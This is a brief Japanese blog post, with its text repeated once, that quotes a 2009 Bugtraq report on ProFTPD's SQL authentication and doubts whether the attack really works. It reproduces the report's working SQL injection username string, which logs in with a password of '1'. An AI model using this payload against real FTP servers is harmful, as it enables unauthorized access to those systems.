proftpd に sqlインジェクションを使ってログインが可能、との記事が bagtraqに流れている。
こんなの本当に可能なのかしらん。。?
http://seclists.org/bugtraq/2009/Feb/0084.html
>Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if >you login with username like:
>USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
>and a password of "1" (without quotes).
こんなの本当に可能なのかしらん。。?
http://seclists.org/bugtraq/2009/Feb/0084.html
>Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if >you login with username like:
>USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
>and a password of "1" (without quotes).